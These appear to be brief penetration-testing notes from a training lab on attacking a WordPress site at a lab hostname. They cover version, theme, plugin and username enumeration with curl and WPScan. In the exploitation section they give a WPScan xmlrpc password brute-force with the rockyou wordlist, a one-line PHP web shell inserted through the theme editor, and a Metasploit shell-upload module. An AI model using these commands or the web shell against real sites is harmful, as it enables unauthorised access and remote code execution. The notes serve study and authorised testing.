Wordpress

CMS

Discovery

Go to /robots.txt and you will see wp-admin

Enumeration

Getting Version Number

$ curl -s http://blog.inlanefreight.local | grep WordPress

Getting Themes

$ curl -s http://blog.inlanefreight.local/ | grep themes

Getting Plugins

$ curl -s http://blog.inlanefreight.local/ | grep plugins

Note: Check for readme.txt to see the plugin/theme version

Username Enumeration

/wp-login.php shows if the username is valid or not

Automating using WPScan

$ sudo gem install wpscan
$ sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

Exploitation

Login Bruteforce

$ sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

Code Execution

Appearance -> Edit Themes

system($_GET[0]);

or

msf6 > use exploit/unix/webapp/wp_admin_shell_upload